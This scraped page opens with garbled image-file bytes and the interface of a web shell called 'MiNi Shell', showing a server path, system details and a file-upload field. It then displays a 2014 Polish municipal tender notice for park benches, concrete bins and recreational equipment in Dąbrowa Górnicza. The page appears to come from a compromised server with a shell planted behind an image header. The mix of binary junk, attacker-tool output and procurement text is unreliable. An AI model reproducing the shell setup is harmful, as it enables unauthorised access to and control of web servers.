JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140604/120693-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: A.	Dostawa ławek parkowych

B.   Dostawa betonowych koszy ulicznych

C.   Montaż ławek

D.   Modernizacja terenu około blokowego na ul. Tierieszkowej 2,3,4,5,6
	
E.   Sportowy Park Podlesie. Przestrzeń wspólna - strefy integracji społecznej w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 120693 - 2014; data zamieszczenia: 04.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> A.	Dostawa ławek parkowych

B.   Dostawa betonowych koszy ulicznych

C.   Montaż ławek

D.   Modernizacja terenu około blokowego na ul. Tierieszkowej 2,3,4,5,6
	
E.   Sportowy Park Podlesie. Przestrzeń wspólna - strefy integracji społecznej w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Postępowanie o udzielenie zamówienia na dostawę o wartości poniżej 207.000 euro.


Zadanie A: DOSTAWA ŁAWEK PARKOWYCH
Przedmiotem  zamówienia jest dostawa 85 szt. ławek parkowych wraz z ich rozładowaniem (bez montażu) na terenie miasta Dąbrowa Górnicza w miejscu wskazanym przez Zamawiającego, w tym:

a)	Ławka betonowo - drewniana montowana poprzez wkopanie w grunt- 70 szt., zgodnie z załącznikiem nr 7.1. do SIWZ
Wymiary :
-	 długość  całkowita  ławki                          - min.   180 cm 
-	 szerokość  całkowita  ławki                      - min      55 cm
-	 wysokość  ( po wkopaniu)       	         - min.     75 cm
-	 wysokość siedziska ( po wkopaniu)         - min.     40 cm
- 	głębokość siedziska                                  - min      35 cm
   Materiały:
-	siedzisko, oparcie - listwy z drewna 
-	podstawa- beton
Kolorystyka i faktura powierzchni:
-	siedzisko oraz oparcie - kolor teak
-	wzmocnienie ławki - kolor grafit

b)	Ławka żeliwno-drewniana montowana za pomocą kotew poprzez przykręcenie do twardego podłoża - 15 szt. zgodnie z załącznikiem nr 7.2. do SIWZ
Wymiary :
-	długość całkowita ławki           - min.  180 cm 
-	szerokość całkowita ławki        - min.  60 cm
-	wysokość całkowita ławki        - min.. 70 cm
-	wysokość siedziska                - min.  40 cm
-	głębokość siedziska               - min   45 cm
Materiały:
-	siedzisko, oparcie - listwy z drewna
-	podstawa- odlew żeliwny malowany tradycyjnie
Kolorystyka i faktura powierzchni:
-	siedzisko oraz oparcie - kolor teak
-	podstawa - kolor czarny

Zadanie B: DOSTAWA BETONOWYCH KOSZY ULICZNYCH
Przedmiotem zamówienia jest dostawa 140 szt. fabrycznie nowych czworokątnych betonowych koszy ulicznych zgodnych ze wzorem wskazanym w załączniku nr 7.3. do SIWZ wraz z ich rozładunkiem.
DANE TECHNICZNE KOSZA ULICZNEGO
- kosz w formie prostopadłościanu o wymiarach zewnętrznych:
  podstawa: 45 x 45 cm +/- 2 cm, z zastrzeżeniem zachowania kwadratowej formy podstawy, 
wysokość: 60 cm +/- 2 cm
- pojemność: min. 45 litrów
- materiał: żelbeton
- klasa betonu: C16/20 lub lepsza
- grubość ścianki betonowej: 5 cm +/- 0,5 cm
- rodzaj pokrycia: kamyk rzeczny
- wyjmowany wkład do kosza z blachy ocynkowanej, o grubości min. 1 mm
- wokół kosza dwa ozdobne frezy o szerokości 3cm +/- 0,5cm, pierwszy w odległości 5cm +/-1 cm od wylotu kosza, drugi w odległości 7cm +/- 1cm od pierwszego, pomalowane gruntoemalią akrylową w kolorze miedzi
- u podstawy kosza cokolik również pomalowany gruntoemalią akrylową w kolorze miedzi o szer. 3cm +/- 0,5cm.

Zadanie C: MONTAŻ ŁAWEK
Przedmiotem zamówienia jest dostawa i montaż w miejscu wskazanym przez Zamawiającego tj. w rejonie budynków mieszkalnych nr 8, 10, 12 zlokalizowanych przy ul. Tysiąclecia w Dąbrowie Górniczej nowych ławek parkowych - 10 szt. i nowych koszy betonowych na śmieci - 6 szt.:

a)	Ławka betonowo - drewniana montowana poprzez wkopanie w podłoże trawiaste - 10 szt. zgodnie z załącznikiem nr 7.1. do SIWZ
Wymiary:
-	długość  całkowita  ławki                          - min.   180 cm 
-	szerokość  całkowita  ławki                      - min      55 cm
-	wysokość  ( po wkopaniu)       	           - min.     75 cm
-	wysokość siedziska ( po wkopaniu)         - min.     40 cm
-	głębokość siedziska                                 - min      35 cm
Materiały:
-	siedzisko, oparcie - listwy z drewna
-	podstawa- beton
Kolorystyka i faktura powierzchni:
-	siedzisko oraz oparcie - kolor teak
-	wzmocnienie ławki - kolor grafit
Sposób montażu: 
Ławka przeznaczona do wkopania w podłoże trawiaste

b)	Kosz betonowy czworokątny rozstawiany na podłożu trawiastym - 6szt. zgodnie z załącznikiem nr 7.3. do SIWZ
DANE TECHNICZNE KOSZA ULICZNEGO
- kosz w formie prostopadłościanu o wymiarach zewnętrznych:
  podstawa: 45 x 45 cm +/- 2 cm, z zastrzeżeniem zachowania kwadratowej formy podstawy, 
wysokość: 60 cm +/- 2 cm
- pojemność: min. 45 litrów
- materiał: żelbeton
- klasa betonu: C16/20 lub lepsza
- grubość ścianki betonowej: 5 cm +/- 0,5 cm
- rodzaj pokrycia: kamyk rzeczny
- wyjmowany wkład do kosza z blachy ocynkowanej, o grubości min. 1 mm
- wokół kosza dwa ozdobne frezy o szerokości 3cm +/- 0,5cm, pierwszy w odległości 5cm +/-1 cm od wylotu kosza, drugi w odległości 7cm +/- 1cm od pierwszego, pomalowane gruntoemalią akrylową w kolorze miedzi
- u podstawy kosza cokolik również pomalowany gruntoemalią akrylową w kolorze miedzi o szer. 3cm +/- 0,5cm.
SPOSÓB MONTAŻU
Kosz wolnostojący

Zadanie D: MODERNIZACJA TERENU OKOŁO BLOKOWEGO NA UL. TIERESZKOWEJ 2,3,4,5,6

Przedmiotem zamówienia jest dostawa i montaż w miejscu wskazanym przez Zamawiającego tj. w rejonie budynków mieszkalnych nr 2, 3, 4, 5, 6 zlokalizowanych przy ul. Tiereszkowej w Dąbrowie Górniczej nowych ławek parkowych - 13 szt., nowych koszy betonowych na śmieci - 14 szt., nowych betonowych ławostołów - 2 szt., nowego betonowego stolika do gry w szachy wraz z krzesełkami - 1 szt.:

a)	Ławka betonowo - drewniana montowana poprzez wkopanie w podłoże trawiaste - 13 szt. zgodnie z załącznikiem nr 7.1. do SIWZ
Wymiary :
-	długość  całkowita  ławki                          - min.   180 cm 
-	szerokość  całkowita  ławki                      - min.      55 cm
-	wysokość  ( po wkopaniu)                        - min.     75 cm
-	wysokość siedziska ( po wkopaniu)         - min.     40 cm
-	głębokość siedziska                                  - min      35 cm
Materiały:
-	siedzisko, oparcie - listwy z drewna
-	podstawa- beton
Kolorystyka i faktura powierzchni:
-	siedzisko oraz oparcie - kolor teak
-	wzmocnienie ławki - kolor grafit
Sposób montażu: 
Ławka przeznaczona do wkopania w podłoże trawiaste

b)	Kosz betonowy czworokątny rozstawiany na podłożu trawiastym - 14 szt. zgodnie z załącznikiem nr 7.3. do SIWZ
DANE TECHNICZNE KOSZA ULICZNEGO
- kosz w formie prostopadłościanu o wymiarach zewnętrznych:
  podstawa: 45 x 45 cm +/- 2 cm, z zastrzeżeniem zachowania kwadratowej formy podstawy, 
wysokość: 60 cm +/- 2 cm
- pojemność: min. 45 litrów
- materiał: żelbeton
- klasa betonu: C16/20 lub lepsza
- grubość ścianki betonowej: 5 cm +/- 0,5 cm
- rodzaj pokrycia: kamyk rzeczny
- wyjmowany wkład do kosza z blachy ocynkowanej, o grubości min. 1 mm
- wokół kosza dwa ozdobne frezy o szerokości 3cm +/- 0,5cm, pierwszy w odległości 5cm +/-1 cm od wylotu kosza, drugi w odległości 7cm +/- 1cm od pierwszego, pomalowane gruntoemalią akrylową w kolorze miedzi
- u podstawy kosza cokolik również pomalowany gruntoemalią akrylową w kolorze miedzi o szer. 3cm +/- 0,5cm.
SPOSÓB MONTAŻU
Kosz wolnostojący

c)	Ławostół betonowy przytwierdzany do podłoża trawiastego poprzez kotwienie do 4 prefabrykowanych fundamentów - 2 szt. zgodnie z załącznikiem nr 7.4. do SIWZ
Wymiary stołu:
- długość min. 200 cm.
- szerokość min. 85 cm.
- wysokość min. 78 cm.
- grubość listew min. 4 cm.
Wymiary ławek:
- długość min. 200 cm.
- szerokość min. 40 cm.
- wysokość min. 44 cm.
- grubość listew min. 4 cm.
Materiały:
-	 siedzisko, blat - listwy z drewna 
-	 podstawa- beton
Kolorystyka i faktura powierzchni:
-	 siedzisko, blat - kolor teak
-	 rodzaj pokrycia podstawy: kamyk rzeczny
Sposób montażu: 
Ławostół przytwierdzany do podłoża trawiastego poprzez kotwienie do 4 prefabrykowanych fundamentów

d)	Betonowy stół do gry w szachy wraz z 4 krzesłami wkopywany do podłoża trawiastego - 1 szt. zgodnie z załącznikiem nr  7.5. do SIWZ
Wymiary stołu:
- długość min. 90 cm.
- szerokość min. 90 cm.
- wysokość min. 81 cm.
- grubość listew min. 4 cm.
Wymiary krzeseł:
- długość min. 40 cm.
- szerokość min. 40 cm.
- wysokość min. 44 cm.
- grubość listew min. 4 cm
Materiały:
- siedzisko,- listwy z drewna
- blat stolika szlifowany i zaimpregnowany specjalnym lakierem chroniącym przed oddziaływaniem warunków atmosferycznych
- podstawa- beton
- części metalowe zabezpieczone farbami antykorozyjnymi lub ocynkowane
Kolorystyka i faktura powierzchni:
- siedzisko, blat - kolor teak
- rodzaj pokrycia podstawy: kamyk rzeczny.
Sposób montażu: 
Stół do gry w szachy wkopywany do podłoża trawiastego


Zadanie E: SPORTOWY PARK PODLESIE. PRZESTRZEŃ WSPÓLNA - STREFY INTEGRACJI SPOŁECZNEJ W DĄBROWIE GÓRNICZEJ
 
Przedmiotem zamówienia jest dostawa i montaż w miejscu wskazanym przez Zamawiającego tj. w Parku Podlesie w Dąbrowie Górniczej nowych ławek parkowych - 18 szt,, nowego zestawu do gry w tenisa ziemnego składającego się z 2 słupków i siatki - 1szt., nowego betonowego stołu do gry w tenisa stołowego - 1 szt,:

a)	Ławka betonowo - drewniana montowana poprzez wkopanie w podłoże trawiaste - 18 szt.  zgodnie z załącznikiem nr 7.1. do SIWZ
Wymiary :
-	długość  całkowita  ławki                         - min.   180 cm 
-	szerokość  całkowita  ławki                      - min.   55 cm
-	wysokość  ( po wkopaniu)       	              - min.   75 cm
-	wysokość siedziska ( po wkopaniu)         - min.   40 cm
-	głębokość siedziska                                 - min   35 cm
Materiały:
-	siedzisko, oparcie - listwy z drewna
-	podstawa- beton
Kolorystyka i faktura powierzchni:
-	siedzisko oraz oparcie - kolor teak
-	wzmocnienie ławki - kolor grafit
Sposób montażu: 
Ławka przeznaczona do wkopania w podłoże trawiaste

b)	Zestaw do gry w tenisa składający się z:
- 2 słupków aluminiowych owalnych, jeden z  naciągiem śrubowym siatki, drugi z elementami zaczepowymi siatki,
- 2 tulei aluminiowych do słupków tenisowych aluminiowych owalnych do montażu w podłożu trawiastym,
- 2 dekli do tulei aluminiowych owalnych, 
-1 siatki do tenisa ziemnego koloru czarnego z fartuchem, o grubości splotu min. 3mm i długości 11m.
c)	Stół betonowy do gry w tenisa stołowego do postawienia na podłożu betonowo-asfaltowym - 1 szt. zgodnie z załącznikiem nr 7.6. do SIWZ
Wymiary :
- długość min. 274 cm
- szerokość min.152 cm
- wysokość min. 76 cm
Materiały:
- Blat stołu wykonany z wysokogatunkowego betonu z kruszywem ozdobnym, szlifowany i lakierowany w celu ochrony przed oddziaływaniem warunków atmosferycznych
- Siatka do gry wykonana z blachy stalowej o gr. 5 mm montowana na stałe do blatu stołu
- Wszystkie elementy stalowe w konstrukcji zabezpieczone antykorozyjnie
- Krawędzie blatu zabezpieczone listwą aluminiową, zapobiegającą obiciom
Sposób montażu: 
Stół do gry w tenisa stołowego do postawienia na podłożu betonowo-asfaltowym

II.  Rozwiązania równoważne /dot. Zadania A do E/
1.	Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych - tj. o parametrach technicznych i jakościowych nie gorszych niż określone w SIWZ - w odniesieniu do materiałów i urządzeń, których pochodzenie zostało określone przez Zamawiającego w SIWZ nazwą producenta.
2.	Zgodnie z art. 30 ust. 5 Ustawy Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez  niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego. Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych ma w szczególności gwarantować realizację robót w zgodzie z dokumentacją techniczną oraz zapewnić uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ.

III. Gwarancja /dot. Zadania A do E/
Dostawca  udzieli  24 miesięcznej gwarancji  na przedmiot dostawy licząc od  daty podpisania przez obie strony protokołu odbioru.
W okresie tym Dostawca zobowiązuje się  usunąć wynikłe wady z wadliwego i nierzetelnego wykonania przedmiotu dostawy nieodpłatnie w terminie pięciu dni od daty zgłoszenia ich przez Zamawiającego. Dostawca nie ponosi odpowiedzialności za usterki wynikłe z działania osób trzecich. Z usunięcia usterek zostanie sporządzony protokół odbioru podpisany przez inspektora nadzoru..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.11.36.00-3, 34.92.84.80-6, 44.11.42.00-4, 37.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie A i B: 		
Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie dostawę elementów małej architektury parkowej o wartości min 20.000,00 zł brutto.

Zadanie C,D i E: 
Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie dostawę elementów małej architektury parkowej wraz z montażem o wartości min 20.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy dostaw pozwalających wykazać, iż Wykonawca spełnia warunek określony w pkt. 8.1.2. SIWZ.  W wykazie nie należy podawać informacji o usługach niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2);</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2.pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3.  w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b Ustawy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
